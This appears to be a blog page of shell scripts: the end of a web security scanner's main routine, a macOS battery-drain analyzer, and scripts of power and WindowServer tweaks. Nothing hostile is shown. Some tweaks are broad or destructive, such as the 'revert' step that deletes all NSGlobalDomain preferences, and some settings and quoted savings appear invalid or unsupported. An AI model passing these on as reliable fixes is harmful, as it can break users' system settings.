        log_debug "Starting API permission testing phase"
        api_permission_testing
    fi
    
    log_debug "Starting HTTP security headers analysis phase"
    http_security_headers
    
    log_debug "Starting subdomain scanning phase"
    scan_subdomains
    
    # Generate reports
    log_debug "Starting report generation phase"
    generate_executive_summary
    generate_technical_report
    generate_vulnerability_report
    generate_api_report
    
    # Summary
    echo
    echo "========================================"
    log_success "Scan Complete!"
    echo "========================================"
    echo
    log_info "Scan directory: $SCAN_DIR"
    log_info "Executive summary: $SCAN_DIR/$EXEC_REPORT"
    log_info "Technical report: $SCAN_DIR/$TECH_REPORT"
    
    if [ "$VULN_SCAN" = true ]; then
        log_info "Vulnerability report: $SCAN_DIR/$VULN_REPORT"
    fi
    
    if [ "$API_SCAN" = true ]; then
        log_info "API security report: $SCAN_DIR/$API_REPORT"
    fi
    
    echo
    log_info "Review the reports for detailed findings"
    log_debug "Script completed at $(date)"
}

################################################################################
# Parse Command Line Arguments
################################################################################
DOMAIN=""
SCAN_SUBDOMAINS=false
MAX_SUBDOMAINS=10
VULN_SCAN=false
API_SCAN=false

while getopts "d:sm:vah" opt; do
    case $opt in
        d)
            DOMAIN="$OPTARG"
            ;;
        s)
            SCAN_SUBDOMAINS=true
            ;;
        m)
            MAX_SUBDOMAINS="$OPTARG"
            ;;
        v)
            VULN_SCAN=true
            ;;
        a)
            API_SCAN=true
            ;;
        h)
            usage
            ;;
        \?)
            log_error "Invalid option: -$OPTARG"
            usage
            ;;
    esac
done

# Validate required arguments
if [ -z "$DOMAIN" ]; then
    log_error "Domain is required"
    usage
fi

# Run main function
main
            echo "${HEADERS[$header]}: Present" >>

EOF

chmod +x ./security_scanner_enhanced.sh
0
0

Macbook: A script to figure out which processes are causing battery usuage/drain issues (even when the laptop lid is closed)

If you’re trying to figure out whats draining your macbook, even when the lid is closed – then try the script below (call with “sudo ./battery_drain_analyzer.sh”):

cat > ~/battery_drain_analyzer.sh << 'EOF'
#!/bin/bash

# Battery Drain Analyzer for macOS
# This script analyzes processes and settings that affect battery life,
# especially when the laptop lid is closed.

# Colors for terminal output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Output file
REPORT_FILE="battery_drain_report_$(date +%Y%m%d_%H%M%S).md"
TEMP_DIR=$(mktemp -d)

echo -e "${GREEN}Battery Drain Analyzer${NC}"
echo "Collecting system information..."
echo "This may take a minute and will require administrator privileges for some checks."
echo ""

# Function to check if running with sudo
check_sudo() {
    if [[ $EUID -ne 0 ]]; then
        echo -e "${YELLOW}Some metrics require sudo access. Re-running with sudo...${NC}"
        sudo "$0" "$@"
        exit $?
    fi
}

# Start the report
cat > "$REPORT_FILE" << EOF
# Battery Drain Analysis Report
**Generated:** $(date '+%Y-%m-%d %H:%M:%S %Z')  
**System:** $(sysctl -n hw.model)  
**macOS Version:** $(sw_vers -productVersion)  
**Uptime:** $(uptime | sed 's/.*up //' | sed 's/,.*//')

---

## Executive Summary
This report analyzes processes and settings that consume battery power, particularly when the laptop lid is closed.

EOF

# 1. Check current power assertions
echo "Checking power assertions..."
cat >> "$REPORT_FILE" << EOF

## 🔋 Current Power State

### Active Power Assertions
Power assertions prevent your Mac from sleeping. Here's what's currently active:

\`\`\`
EOF
pmset -g assertions | grep -A 20 "Listed by owning process:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 2. Check sleep prevention
SLEEP_STATUS=$(pmset -g | grep "sleep" | head -1)
if [[ $SLEEP_STATUS == *"sleep prevented"* ]]; then
    echo "" >> "$REPORT_FILE"
    echo "⚠️ **WARNING:** Sleep is currently being prevented!" >> "$REPORT_FILE"
fi

# 3. Analyze power settings
echo "Analyzing power settings..."
cat >> "$REPORT_FILE" << EOF

## ⚙️ Power Management Settings

### Current Power Profile
\`\`\`
EOF
pmset -g >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# Identify problematic settings
cat >> "$REPORT_FILE" << EOF

### Problematic Settings for Battery Life
EOF

POWERNAP=$(pmset -g | grep "powernap" | awk '{print $2}')
TCPKEEPALIVE=$(pmset -g | grep "tcpkeepalive" | awk '{print $2}')
WOMP=$(pmset -g | grep "womp" | awk '{print $2}')
STANDBY=$(pmset -g | grep "standby" | awk '{print $2}')

if [[ "$POWERNAP" == "1" ]]; then
    echo "- ❌ **Power Nap is ENABLED** - Allows Mac to wake for updates (HIGH battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ Power Nap is disabled" >> "$REPORT_FILE"
fi

if [[ "$TCPKEEPALIVE" == "1" ]]; then
    echo "- ⚠️ **TCP Keep-Alive is ENABLED** - Maintains network connections during sleep (MEDIUM battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ TCP Keep-Alive is disabled" >> "$REPORT_FILE"
fi

if [[ "$WOMP" == "1" ]]; then
    echo "- ⚠️ **Wake on LAN is ENABLED** - Allows network wake (MEDIUM battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ Wake on LAN is disabled" >> "$REPORT_FILE"
fi

# 4. Collect CPU usage data
echo "Collecting CPU usage data..."
cat >> "$REPORT_FILE" << EOF

## 📊 Top Battery-Draining Processes

### Current CPU Usage (Higher CPU = More Battery Drain)
EOF

# Get top processes by CPU
top -l 2 -n 20 -o cpu -stats pid,command,cpu,mem,purg,user | tail -n 21 > "$TEMP_DIR/top_output.txt"

# Parse and format top output
echo "| PID | Process | CPU % | Memory | User |" >> "$REPORT_FILE"
echo "|-----|---------|-------|--------|------|" >> "$REPORT_FILE"
tail -n 20 "$TEMP_DIR/top_output.txt" | while read line; do
    if [[ ! -z "$line" ]] && [[ "$line" != *"PID"* ]]; then
        PID=$(echo "$line" | awk '{print $1}')
        PROCESS=$(echo "$line" | awk '{print $2}' | cut -c1-30)
        CPU=$(echo "$line" | awk '{print $3}')
        MEM=$(echo "$line" | awk '{print $4}')
        USER=$(echo "$line" | awk '{print $NF}')
        
        # Highlight high CPU processes
        # Use awk for floating point comparison to avoid bc dependency
        if awk "BEGIN {exit !($CPU > 10.0)}" 2>/dev/null; then
            echo "| $PID | **$PROCESS** | **$CPU** | $MEM | $USER |" >> "$REPORT_FILE"
        else
            echo "| $PID | $PROCESS | $CPU | $MEM | $USER |" >> "$REPORT_FILE"
        fi
    fi
done

# 5. Check for power metrics (if available with sudo)
if [[ $EUID -eq 0 ]]; then
    echo "Collecting detailed power metrics..."
    cat >> "$REPORT_FILE" << EOF

### Detailed Power Consumption Analysis
EOF
    
    # Run powermetrics for 2 seconds
    powermetrics --samplers tasks --show-process-energy -i 2000 -n 1 2>/dev/null > "$TEMP_DIR/powermetrics.txt"
    
    if [[ -s "$TEMP_DIR/powermetrics.txt" ]]; then
        echo '```' >> "$REPORT_FILE"
        grep -A 30 -F "*** Running tasks ***" "$TEMP_DIR/powermetrics.txt" | head -35 >> "$REPORT_FILE"
        echo '```' >> "$REPORT_FILE"
    fi
fi

# 6. Check wake reasons
echo "Analyzing wake patterns..."
cat >> "$REPORT_FILE" << EOF

## 💤 Sleep/Wake Analysis

### Recent Wake Events
These events show why your Mac woke from sleep:

\`\`\`
EOF
pmset -g log | grep -E "Wake from|DarkWake|Notification" | tail -10 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 7. Check scheduled wake events
cat >> "$REPORT_FILE" << EOF

### Scheduled Wake Requests
These are processes that have requested to wake your Mac:

\`\`\`
EOF
pmset -g log | grep "Wake Requests" | tail -5 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 8. Background services analysis
echo "Analyzing background services..."
cat >> "$REPORT_FILE" << EOF

## 🔄 Background Services Analysis

### Potentially Problematic Services
EOF

# Check for common battery-draining services
SERVICES_TO_CHECK=(
    "Spotlight:mds_stores"
    "Time Machine:backupd"
    "Photos:photoanalysisd"
    "iCloud:bird"
    "CrowdStrike:falcon"
    "Dropbox:Dropbox"
    "Google Drive:Google Drive"
    "OneDrive:OneDrive"
    "Creative Cloud:Creative Cloud"
    "Docker:com.docker"
    "Parallels:prl_"
    "VMware:vmware"
    "Spotify:Spotify"
    "Slack:Slack"
    "Microsoft Teams:Teams"
    "Zoom:zoom.us"
    "Chrome:Google Chrome"
    "Edge:Microsoft Edge"
)

echo "| Service | Status | Impact |" >> "$REPORT_FILE"
echo "|---------|--------|--------|" >> "$REPORT_FILE"

for service in "${SERVICES_TO_CHECK[@]}"; do
    IFS=':' read -r display_name process_name <<< "$service"
    # Use pgrep with fixed string matching to avoid regex issues
    if pgrep -qfi "$process_name" 2>/dev/null; then
        # Get CPU usage for this process (escape special characters)
        escaped_name=$(printf '%s\n' "$process_name" | sed 's/[[\.*^$()+?{|]/\\&/g')
        CPU_USAGE=$(ps aux | grep -i "$escaped_name" | grep -v grep | awk '{sum+=$3} END {print sum}')
        if [[ -z "$CPU_USAGE" ]]; then
            CPU_USAGE="0"
        fi
        
        # Determine impact level
        # Use awk for floating point comparison
        if awk "BEGIN {exit !($CPU_USAGE > 20.0)}" 2>/dev/null; then
            IMPACT="HIGH ⚠️"
        elif awk "BEGIN {exit !($CPU_USAGE > 5.0)}" 2>/dev/null; then
            IMPACT="MEDIUM"
        else
            IMPACT="LOW"
        fi
        
        echo "| $display_name | Running (${CPU_USAGE}% CPU) | $IMPACT |" >> "$REPORT_FILE"
    fi
done

# 9. Battery health check
echo "Checking battery health..."
cat >> "$REPORT_FILE" << EOF

## 🔋 Battery Health Status

\`\`\`
EOF
system_profiler SPPowerDataType | grep -A 20 "Battery Information:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 10. Recommendations
cat >> "$REPORT_FILE" << EOF

## 💡 Recommendations

### Immediate Actions to Improve Battery Life

#### Critical (Do These First):
EOF

# Generate recommendations based on findings
if [[ "$POWERNAP" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
1. **Disable Power Nap**
   \`\`\`bash
   sudo pmset -a powernap 0
   \`\`\`
EOF
fi

if [[ "$TCPKEEPALIVE" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
2. **Disable TCP Keep-Alive**
   \`\`\`bash
   sudo pmset -a tcpkeepalive 0
   \`\`\`
EOF
fi

if [[ "$WOMP" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
3. **Disable Wake for Network Access**
   \`\`\`bash
   sudo pmset -a womp 0
   \`\`\`
EOF
fi

cat >> "$REPORT_FILE" << EOF

#### Additional Optimizations:
4. **Reduce Display Sleep Time**
   \`\`\`bash
   sudo pmset -a displaysleep 5
   \`\`\`

5. **Enable Automatic Graphics Switching** (if available)
   \`\`\`bash
   sudo pmset -a gpuswitch 2
   \`\`\`

6. **Set Faster Standby Delay**
   \`\`\`bash
   sudo pmset -a standbydelay 1800  # 30 minutes
   \`\`\`

### Process-Specific Recommendations:
EOF

# Check for specific high-drain processes and provide detailed solutions
if pgrep -q "mds_stores" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 🔍 **Spotlight Indexing Detected**
**Problem:** Spotlight is actively indexing your drive, consuming significant CPU and battery.
**Solutions:**
- **Temporary pause:** \`sudo mdutil -a -i off\` (re-enable with \`on\`)
- **Check indexing status:** \`mdutil -s /\`
- **Rebuild index if stuck:** \`sudo mdutil -E /\`
- **Exclude folders:** System Settings > Siri & Spotlight > Spotlight Privacy

EOF
fi

if pgrep -q "backupd" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 💾 **Time Machine Backup Running**
**Problem:** Active backup consuming resources.
**Solutions:**
- **Skip current backup:** Click Time Machine icon > Skip This Backup
- **Schedule for AC power:** \`sudo defaults write /Library/Preferences/com.apple.TimeMachine RequiresACPower -bool true\`
- **Reduce backup frequency:** Use TimeMachineEditor app
- **Check backup size:** \`tmutil listbackups | tail -1 | xargs tmutil calculatedrift\`

EOF
fi

if pgrep -q "photoanalysisd" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 📸 **Photos Library Analysis Active**
**Problem:** Photos app analyzing images for faces, objects, and scenes.
**Solutions:**
- **Pause temporarily:** Quit Photos app completely
- **Disable features:** Photos > Settings > uncheck "Enable Machine Learning"
- **Process overnight:** Leave Mac plugged in overnight to complete
- **Check progress:** Activity Monitor > Search "photo"

EOF
fi

# Check for additional common issues
if pgrep -q "kernel_task" 2>/dev/null && [[ $(ps aux | grep "kernel_task" | grep -v grep | awk '{print $3}' | cut -d. -f1) -gt 50 ]]; then
    cat >> "$REPORT_FILE" << EOF
#### 🔥 **High kernel_task CPU Usage**
**Problem:** System thermal management or driver issues.
**Solutions:**
- **Reset SMC:** Shut down > Press & hold Shift-Control-Option-Power for 10s
- **Check temperatures:** \`sudo powermetrics --samplers smc | grep temp\`
- **Disconnect peripherals:** Especially USB-C hubs and external displays
- **Update macOS:** Check for system updates
- **Safe mode test:** Restart holding Shift key

EOF
fi

if pgrep -q "WindowServer" 2>/dev/null && [[ $(ps aux | grep "WindowServer" | grep -v grep | awk '{print $3}' | cut -d. -f1) -gt 30 ]]; then
    cat >> "$REPORT_FILE" << EOF
#### 🖥️ **High WindowServer Usage**
**Problem:** Graphics rendering issues or display problems.
**Solutions:**
- **Reduce transparency:** System Settings > Accessibility > Display > Reduce transparency
- **Close visual apps:** Quit apps with animations or video
- **Reset display settings:** Option-click Scaled in Display settings
- **Disable display sleep prevention:** \`pmset -g assertions | grep -i display\`

EOF
fi

# 11. Battery drain score
echo "Calculating battery drain score..."
cat >> "$REPORT_FILE" << EOF

## 📈 Overall Battery Drain Score

EOF

# Calculate score (0-100, where 100 is worst)
SCORE=0
[[ "$POWERNAP" == "1" ]] && SCORE=$((SCORE + 30))
[[ "$TCPKEEPALIVE" == "1" ]] && SCORE=$((SCORE + 15))
[[ "$WOMP" == "1" ]] && SCORE=$((SCORE + 10))

# Add points for running services
pgrep -q "mds_stores" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "backupd" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "photoanalysisd" 2>/dev/null && SCORE=$((SCORE + 5))
pgrep -q "falcon" 2>/dev/null && SCORE=$((SCORE + 10))

# Determine rating
if [[ $SCORE -lt 20 ]]; then
    RATING="✅ **EXCELLENT** - Minimal battery drain expected"
elif [[ $SCORE -lt 40 ]]; then
    RATING="👍 **GOOD** - Some optimization possible"
elif [[ $SCORE -lt 60 ]]; then
    RATING="⚠️ **FAIR** - Noticeable battery drain"
else
    RATING="❌ **POOR** - Significant battery drain"
fi

cat >> "$REPORT_FILE" << EOF
**Battery Drain Score: $SCORE/100**  
**Rating: $RATING**

Higher scores indicate more battery drain. A score above 40 suggests optimization is needed.

---

## 📝 How to Use This Report

1. Review the **Executive Summary** for quick insights
2. Check **Problematic Settings** and apply recommended fixes
3. Identify high CPU processes in the **Top Battery-Draining Processes** section
4. Follow the **Recommendations** in order of priority
5. Re-run this script after making changes to measure improvement

## 🛠️ Common Battery Issues & Solutions

### 🔴 Critical Issues (Fix Immediately)

#### Sleep Prevention Issues
**Symptoms:** Mac won't sleep, battery drains with lid closed
**Diagnosis:** \`pmset -g assertions\`
**Solutions:**
- Kill preventing apps: \`pmset -g assertions | grep -i prevent\`
- Force sleep: \`pmset sleepnow\`
- Reset power management: \`sudo pmset -a restoredefaults\`

#### Runaway Processes
**Symptoms:** Fan running constantly, Mac gets hot, rapid battery drain
**Diagnosis:** \`top -o cpu\` or Activity Monitor
**Solutions:**
- Force quit: \`kill -9 [PID]\` or Activity Monitor > Force Quit
- Disable startup items: System Settings > General > Login Items
- Clean launch agents: \`ls ~/Library/LaunchAgents\`

### 🟡 Common Issues

#### Bluetooth Battery Drain
**Problem:** Bluetooth constantly searching for devices
**Solutions:**
- Reset Bluetooth module: Shift+Option click BT icon > Reset
- Remove unused devices: System Settings > Bluetooth
- Disable when not needed: \`sudo defaults write /Library/Preferences/com.apple.Bluetooth ControllerPowerState 0\`

#### Safari/Chrome High Energy Use
**Problem:** Browser tabs consuming excessive resources
**Solutions:**
- Use Safari over Chrome (more efficient on Mac)
- Install ad blockers to reduce JavaScript load
- Limit tabs: Use OneTab or similar extension
- Disable auto-play: Safari > Settings > Websites > Auto-Play

#### External Display Issues
**Problem:** Discrete GPU activation draining battery
**Solutions:**
- Use single display when on battery
- Lower resolution: System Settings > Displays
- Use clamshell mode efficiently
- Check GPU: \`pmset -g\` look for gpuswitch

#### Cloud Sync Services
**Problem:** Continuous syncing draining battery
**Solutions:**
- **iCloud:** System Settings > Apple ID > iCloud > Optimize Mac Storage
- **Dropbox:** Pause sync or use selective sync
- **OneDrive:** Pause syncing when on battery
- **Google Drive:** File Stream > Preferences > Bandwidth settings

### 🟢 Preventive Measures

#### Daily Habits
- Close apps instead of just minimizing
- Disconnect peripherals when not in use
- Use Safari for better battery life
- Enable Low Power Mode when unplugged
- Reduce screen brightness (saves 10-20% battery)

#### Weekly Maintenance
- Restart Mac weekly to clear memory
- Check Activity Monitor for unusual processes
- Update apps and macOS regularly
- Clear browser cache and cookies
- Review login items and launch agents

#### Monthly Checks
- Calibrate battery (full discharge and charge)
- Clean fans and vents for better cooling
- Review and remove unused apps
- Check storage (full drives impact performance)
- Run Disk Utility First Aid

### Quick Fix Scripts

#### 🚀 Basic Optimization (Safe)
Save and run this script to apply all recommended power optimizations:

\`\`\`bash
#!/bin/bash
# Apply all power optimizations
sudo pmset -a powernap 0
sudo pmset -a tcpkeepalive 0
sudo pmset -a womp 0
sudo pmset -a standbydelay 1800
sudo pmset -a displaysleep 5
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800
echo "Power optimizations applied!"
\`\`\`

#### 💪 Aggressive Battery Saving
For maximum battery life (may affect convenience):

\`\`\`bash
#!/bin/bash
# Aggressive battery saving settings
sudo pmset -b displaysleep 2
sudo pmset -b disksleep 10
sudo pmset -b sleep 5
sudo pmset -b powernap 0
sudo pmset -b tcpkeepalive 0
sudo pmset -b womp 0
sudo pmset -b ttyskeepawake 0
sudo pmset -b gpuswitch 0  # Force integrated GPU
sudo pmset -b hibernatemode 25  # Hibernate only mode
echo "Aggressive battery settings applied!"
\`\`\`

#### 🔄 Reset to Defaults
To restore factory power settings:

\`\`\`bash
#!/bin/bash
sudo pmset -a restoredefaults
echo "Power settings restored to defaults"
\`\`\`

---

*Report generated by Battery Drain Analyzer v1.0*
EOF

# Cleanup
rm -rf "$TEMP_DIR"

# Summary
echo ""
echo -e "${GREEN}✅ Analysis Complete!${NC}"
echo "Report saved to: $REPORT_FILE"
echo ""
echo "Key findings:"
[[ "$POWERNAP" == "1" ]] && echo -e "${RED}  ❌ Power Nap is enabled (HIGH drain)${NC}"
[[ "$TCPKEEPALIVE" == "1" ]] && echo -e "${YELLOW}  ⚠️ TCP Keep-Alive is enabled (MEDIUM drain)${NC}"
[[ "$WOMP" == "1" ]] && echo -e "${YELLOW}  ⚠️ Wake on LAN is enabled (MEDIUM drain)${NC}"
echo ""
echo "To view the full report:"
echo "  cat $REPORT_FILE"
echo ""
echo "To apply all recommended fixes:"
echo "  sudo pmset -a powernap 0 tcpkeepalive 0 womp 0"

EOF

chmod +x ~/battery_drain_analyzer.sh

If you see windowServer as your top consumer then consider the following:

# 1. Restart WindowServer (logs you out!)
sudo killall -HUP WindowServer

# 2. Reduce transparency
defaults write com.apple.universalaccess reduceTransparency -bool true

# 3. Disable animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false

# 4. Reset display preferences
rm ~/Library/Preferences/com.apple.windowserver.plist

Finer grained optimisations:

#!/bin/bash

echo "🔧 Applying ALL WindowServer Optimizations for M3 MacBook Pro..."
echo "This will reduce power consumption significantly"
echo ""

# ============================================
# VISUAL EFFECTS & ANIMATIONS (30-40% reduction)
# ============================================
echo "Disabling visual effects and animations..."

# Reduce transparency and motion
defaults write com.apple.universalaccess reduceTransparency -bool true
defaults write com.apple.universalaccess reduceMotion -bool true
defaults write com.apple.Accessibility ReduceMotionEnabled -int 1

# Disable smooth scrolling and window animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false
defaults write NSGlobalDomain NSScrollAnimationEnabled -bool false
defaults write NSGlobalDomain NSScrollViewRubberbanding -bool false
defaults write NSGlobalDomain NSWindowResizeTime -float 0.001
defaults write NSGlobalDomain NSDocumentRevisionsWindowTransformAnimation -bool false
defaults write NSGlobalDomain NSToolbarFullScreenAnimationDuration -float 0
defaults write NSGlobalDomain NSBrowserColumnAnimationSpeedMultiplier -float 0

# Dock optimizations
defaults write com.apple.dock autohide-time-modifier -float 0
defaults write com.apple.dock launchanim -bool false
defaults write com.apple.dock mineffect -string "scale"
defaults write com.apple.dock show-recents -bool false
defaults write com.apple.dock expose-animation-duration -float 0.1
defaults write com.apple.dock hide-mirror -bool true

# Mission Control optimizations
defaults write com.apple.dock expose-group-by-app -bool false
defaults write com.apple.dock mru-spaces -bool false
defaults write com.apple.dock dashboard-in-overlay -bool true

# Finder optimizations
defaults write com.apple.finder DisableAllAnimations -bool true
defaults write com.apple.finder AnimateWindowZoom -bool false
defaults write com.apple.finder AnimateInfoPanes -bool false
defaults write com.apple.finder FXEnableSlowAnimation -bool false

# Quick Look animations
defaults write -g QLPanelAnimationDuration -float 0

# Mail animations
defaults write com.apple.mail DisableReplyAnimations -bool true
defaults write com.apple.mail DisableSendAnimations -bool true

# ============================================
# M3-SPECIFIC OPTIMIZATIONS (10-15% reduction)
# ============================================
echo "Applying M3-specific optimizations..."

# Disable font smoothing (M3 handles text well without it)
defaults -currentHost write NSGlobalDomain AppleFontSmoothing -int 0
defaults write NSGlobalDomain CGFontRenderingFontSmoothingDisabled -bool true

# Optimize for battery when unplugged
sudo pmset -b gpuswitch 0  # Use efficiency cores more
sudo pmset -b lessbright 1 # Slightly dim display on battery
sudo pmset -b displaysleep 5  # Faster display sleep

# Reduce background rendering
defaults write NSGlobalDomain NSQuitAlwaysKeepsWindows -bool false
defaults write NSGlobalDomain NSDisableAutomaticTermination -bool true

# ============================================
# BROWSER OPTIMIZATIONS (15-25% reduction)
# ============================================
echo "Optimizing browsers..."

# Chrome optimizations
defaults write com.google.Chrome DisableHardwareAcceleration -bool true
defaults write com.google.Chrome CGDisableCoreAnimation -bool true
defaults write com.google.Chrome RendererProcessLimit -int 2
defaults write com.google.Chrome NSQuitAlwaysKeepsWindows -bool false

# Safari optimizations (more efficient than Chrome)
defaults write com.apple.Safari WebKitAcceleratedCompositingEnabled -bool false
defaults write com.apple.Safari WebKitWebGLEnabled -bool false
defaults write com.apple.Safari WebKit2WebGLEnabled -bool false

# Stable browser (if Chromium-based)
defaults write com.stable.browser DisableHardwareAcceleration -bool true

# ============================================
# ADVANCED WINDOWSERVER TWEAKS (5-10% reduction)
# ============================================
echo "Applying advanced WindowServer tweaks..."

# Reduce compositor update rate
defaults write com.apple.WindowManager StandardHideDelay -int 0
defaults write com.apple.WindowManager StandardHideTime -int 0
defaults write com.apple.WindowManager EnableStandardClickToShowDesktop -bool false

# Reduce shadow calculations
defaults write NSGlobalDomain NSUseLeopardWindowShadow -bool true

# Disable Dashboard
defaults write com.apple.dashboard mcx-disabled -bool true

# Menu bar transparency
defaults write NSGlobalDomain AppleEnableMenuBarTransparency -bool false

# ============================================
# DISPLAY SETTINGS (20-30% reduction)
# ============================================
echo "Optimizing display settings..."

# Enable automatic brightness adjustment
sudo defaults write /Library/Preferences/com.apple.iokit.AmbientLightSensor "Automatic Display Enabled" -bool true

# Power management settings
sudo pmset -a displaysleep 5
sudo pmset -a disksleep 10
sudo pmset -a sleep 15
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800

# ============================================
# BACKGROUND SERVICES
# ============================================
echo "Optimizing background services..."

# Reduce Spotlight activity
sudo mdutil -a -i off  # Temporarily disable, re-enable with 'on'

# Limit background app refresh
defaults write NSGlobalDomain NSAppSleepDisabled -bool false

# ============================================
# APPLY ALL CHANGES
# ============================================
echo "Applying changes..."

# Restart affected services
killall Dock
killall Finder
killall SystemUIServer
killall Mail 2>/dev/null
killall Safari 2>/dev/null
killall "Google Chrome" 2>/dev/null

echo ""
echo "✅ All optimizations applied!"
echo ""
echo "📊 Expected improvements:"
echo "  • WindowServer CPU: 4.5% → 1-2%"
echo "  • Battery life gain: +1-2 hours"
echo "  • GPU power reduction: ~30-40%"
echo ""
echo "⚠️  IMPORTANT: Please log out and back in for all changes to take full effect"
echo ""
echo "💡 To monitor WindowServer usage:"
echo "   ps aux | grep WindowServer | grep -v grep | awk '{print \$3\"%\"}'"
echo ""
echo "🔄 To revert all changes, run:"
echo "   defaults delete com.apple.universalaccess"
echo "   defaults delete NSGlobalDomain"
echo "   defaults delete com.apple.dock"
echo "   killall Dock && killall Finder"

To optimise the power when the lid is closed, below are some options:

#!/bin/bash

echo "🔋 Applying CRITICAL closed-lid battery optimizations for M3 MacBook Pro..."
echo "These settings specifically target battery drain when lid is closed"
echo ""

# ============================================
# #1 HIGHEST IMPACT (50-70% reduction when lid closed)
# ============================================
echo "1️⃣ Disabling Power Nap (HIGHEST IMPACT - stops wake for updates)..."
sudo pmset -a powernap 0

echo "2️⃣ Disabling TCP Keep-Alive (HIGH IMPACT - stops network maintenance)..."
sudo pmset -a tcpkeepalive 0

echo "3️⃣ Disabling Wake for Network Access (HIGH IMPACT - prevents network wakes)..."
sudo pmset -a womp 0

# ============================================
# #2 HIGH IMPACT (20-30% reduction)
# ============================================
echo "4️⃣ Setting aggressive sleep settings..."
# When on battery, sleep faster and deeper
sudo pmset -b sleep 1                    # Sleep after 1 minute of inactivity
sudo pmset -b disksleep 5                # Spin down disk after 5 minutes
sudo pmset -b hibernatemode 25           # Hibernate only (no sleep+RAM power)
sudo pmset -b standbydelay 300           # Enter standby after 5 minutes
sudo pmset -b autopoweroff 1             # Enable auto power off
sudo pmset -b autopoweroffdelay 900      # Power off after 15 minutes

echo "5️⃣ Disabling wake features..."
sudo pmset -a ttyskeepawake 0           # Don't wake for terminal sessions
sudo pmset -a lidwake 0                  # Don't wake on lid open (until power button)
sudo pmset -a acwake 0                   # Don't wake on AC attach

# ============================================
# #3 MEDIUM IMPACT (10-20% reduction)
# ============================================
echo "6️⃣ Disabling background services that wake the system..."

# Disable Bluetooth wake
sudo defaults write /Library/Preferences/com.apple.Bluetooth.plist ControllerPowerState 0

# Disable Location Services wake
sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool false

# Disable Find My wake events
sudo pmset -a proximityWake 0 2>/dev/null

# Disable Handoff/Continuity features that might wake
sudo defaults write com.apple.Handoff HandoffEnabled -bool false

# ============================================
# #4 SPECIFIC WAKE PREVENTION (5-10% reduction)
# ============================================
echo "7️⃣ Preventing specific wake events..."

# Disable scheduled wake events
sudo pmset repeat cancel

# Clear any existing scheduled events
sudo pmset schedule cancelall

# Disable DarkWake (background wake without display)
sudo pmset -a darkwakes 0 2>/dev/null

# Disable wake for Time Machine
sudo defaults write /Library/Preferences/com.apple.TimeMachine.plist RequiresACPower -bool true

# ============================================
# #5 BACKGROUND APP PREVENTION
# ============================================
echo "8️⃣ Stopping apps from preventing sleep..."

# Kill processes that commonly prevent sleep
killall -9 photoanalysisd 2>/dev/null
killall -9 mds_stores 2>/dev/null
killall -9 backupd 2>/dev/null

# Disable Spotlight indexing when on battery
sudo mdutil -a -i off

# Disable Photos analysis
launchctl disable user/$UID/com.apple.photoanalysisd

# ============================================
# VERIFY SETTINGS
# ============================================
echo ""
echo "✅ Closed-lid optimizations complete! Verifying..."
echo ""
echo "Current problematic settings status:"
pmset -g | grep -E "powernap|tcpkeepalive|womp|sleep|hibernatemode|standby|lidwake"

echo ""
echo "Checking what might still wake your Mac:"
pmset -g assertions | grep -i "prevent"

echo ""
echo "==============================================="
echo "🎯 EXPECTED RESULTS WITH LID CLOSED:"
echo "  • Battery drain: 1-2% per hour (down from 5-10%)"
echo "  • No wake events except opening lid + pressing power"
echo "  • Background services completely disabled"
echo ""
echo "⚠️ TRADE-OFFS:"
echo "  • No email/message updates with lid closed"
echo "  • No Time Machine backups on battery"
echo "  • Must press power button after opening lid"
echo "  • Handoff/AirDrop disabled"
echo ""
echo "🔄 TO RESTORE CONVENIENCE FEATURES:"
echo "sudo pmset -a powernap 1 tcpkeepalive 1 womp 1 lidwake 1"
echo "sudo pmset -b hibernatemode 3 standbydelay 10800"
echo "sudo mdutil -a -i on"
echo ""
echo "📊 TEST YOUR BATTERY DRAIN:"
echo "1. Note battery % and close lid"
echo "2. Wait 1 hour"
echo "3. Open and check battery %"
echo "4. Should lose only 1-2%"
0
0